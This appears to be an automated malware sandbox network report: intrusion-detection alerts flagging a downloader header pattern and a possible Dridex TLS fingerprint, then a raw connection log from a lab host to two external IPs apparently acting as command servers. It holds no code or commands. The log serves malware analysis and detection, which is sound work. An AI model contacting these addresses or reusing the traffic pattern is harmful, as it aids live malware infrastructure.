                                                                                                    2024-12-16T13:44:18.453612+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949935188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:20.219994+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949943188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:20.899473+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949943188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:22.653229+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949949188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:23.340666+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949949188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:24.939052+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949955188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:25.619144+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949955188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:27.376908+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949961188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:28.064403+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949961188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:29.829325+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949967188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:30.519577+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949967188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:32.109911+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949973188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:32.789400+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949973188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:34.350582+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949979188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:35.035582+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949979188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:36.808542+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949985188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:37.521212+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949985188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:39.100474+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.949994188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:39.786964+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949994188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:41.353932+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950000188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:42.040026+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950000188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:43.662474+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950002188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:44.345174+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950002188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:46.116004+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950003188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:46.802858+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950003188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:48.405797+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950004188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:49.097759+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950004188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:50.705288+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950005188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:51.413032+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950005188.119.66.185443TCP
                                                                                                    2024-12-16T13:44:53.179426+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.950006188.119.66.185443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 16, 2024 13:43:40.020494938 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:40.020524025 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:40.020576954 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:40.030612946 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:40.030637026 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:41.682342052 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:41.682455063 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:41.758064985 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:41.758085012 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:41.758424044 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:41.758542061 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:41.761827946 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:41.807331085 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.371598005 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.371689081 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.371802092 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:42.371802092 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:42.373691082 CET49837443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:42.373712063 CET44349837188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.374959946 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:42.494920015 CET20244984331.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.495068073 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:42.495148897 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:42.616097927 CET20244984331.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:42.616244078 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:42.736171007 CET20244984331.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:43.736934900 CET20244984331.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:43.789324045 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:45.745213985 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:45.745261908 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:45.745687008 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:45.745891094 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:45.745918036 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:47.388926029 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:47.389022112 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:47.411477089 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:47.411484003 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:47.411636114 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:47.411643982 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111385107 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111447096 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111490965 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111519098 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.111541033 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111557961 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111684084 CET49853443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.111702919 CET44349853188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.229960918 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230015039 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:48.230076075 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230343103 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:48.230356932 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.697443008 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.697566032 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698095083 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698105097 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:49.698260069 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:49.698266029 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.385876894 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.385953903 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.385957003 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.386001110 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.392571926 CET49859443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.392590046 CET44349859188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.393446922 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.513813972 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.513967037 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.513967037 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.514022112 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:50.620460987 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620515108 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.620604992 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620898008 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:50.620918989 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.634021044 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:50.680424929 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:51.484430075 CET20244986531.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:43:51.484579086 CET498652024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:43:52.261512995 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.261583090 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262028933 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262046099 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.262362957 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.262371063 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952092886 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952155113 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952167034 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:52.952210903 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952435017 CET49866443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:52.952455997 CET44349866188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:53.073301077 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073348045 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:53.073486090 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073690891 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:53.073698044 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.538887978 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.538964033 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539633036 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539648056 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:54.539673090 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:54.539680004 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228497028 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228555918 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228564024 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228581905 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.228598118 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228616953 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228940010 CET49872443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.228952885 CET44349872188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.339359999 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339418888 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:55.339503050 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339777946 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:55.339791059 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.816800117 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.816929102 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817517996 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817531109 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:56.817682028 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:56.817686081 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515036106 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515130043 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.515232086 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.515393972 CET49878443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.515414000 CET44349878188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.636512995 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636571884 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:57.636646032 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636888981 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:57.636905909 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.097292900 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.097392082 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.097959042 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.097970963 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.098115921 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.098120928 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.804796934 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.804864883 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.805028915 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.805238008 CET49884443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.805264950 CET44349884188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.916940928 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.916975021 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:43:59.917048931 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.917325020 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:43:59.917332888 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.369452953 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.369550943 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370129108 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370135069 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:01.370317936 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:01.370323896 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052407980 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052495956 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.052639008 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052639008 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052967072 CET49890443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.052979946 CET44349890188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.167363882 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167422056 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:02.167526960 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167854071 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:02.167869091 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.811048985 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.811177015 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.834969997 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.834980965 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:03.835000038 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:03.835004091 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540890932 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540954113 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.540958881 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.540998936 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.541260004 CET49896443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.541281939 CET44349896188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.651663065 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.651714087 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:04.651779890 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.652014017 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:04.652028084 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.110436916 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.110517979 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.110995054 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.111006021 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.111193895 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.111198902 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799407005 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799488068 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.799520016 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799541950 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799885988 CET49902443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.799902916 CET44349902188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.917823076 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.917912006 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:06.918000937 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.918279886 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:06.918301105 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:08.367949963 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:08.368016005 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:08.368482113 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:08.368498087 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:08.368645906 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:08.368654013 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:09.048861027 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:09.048932076 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:09.048962116 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.049034119 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.049138069 CET49908443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.049181938 CET44349908188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:09.167185068 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.167224884 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:09.167336941 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.167606115 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:09.167624950 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:10.808795929 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:10.808898926 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:10.809524059 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:10.809534073 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:10.809683084 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:10.809689045 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:11.494123936 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:11.494199038 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:11.494272947 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.494307041 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.494570971 CET49914443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.494595051 CET44349914188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:11.604787111 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.604844093 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:11.604962111 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.605186939 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:11.605202913 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.058337927 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.058404922 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.058914900 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.058923006 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.059086084 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.059092045 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.743077040 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.743158102 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.743206978 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.743206978 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.743518114 CET49921443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.743531942 CET44349921188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.854688883 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.854734898 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:13.854845047 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.855159998 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:13.855185032 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:15.498188019 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:15.498260021 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:15.498891115 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:15.498898983 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:15.498925924 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:15.498933077 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:16.184851885 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:16.184936047 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.184946060 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:16.185015917 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.185194016 CET49928443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.185204029 CET44349928188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:16.292201996 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.292323112 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:16.292407990 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.292665958 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:16.292696953 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:17.758379936 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:17.758451939 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:17.758882999 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:17.758904934 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:17.759149075 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:17.759161949 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:18.453633070 CET44349935188.119.66.185192.168.2.9
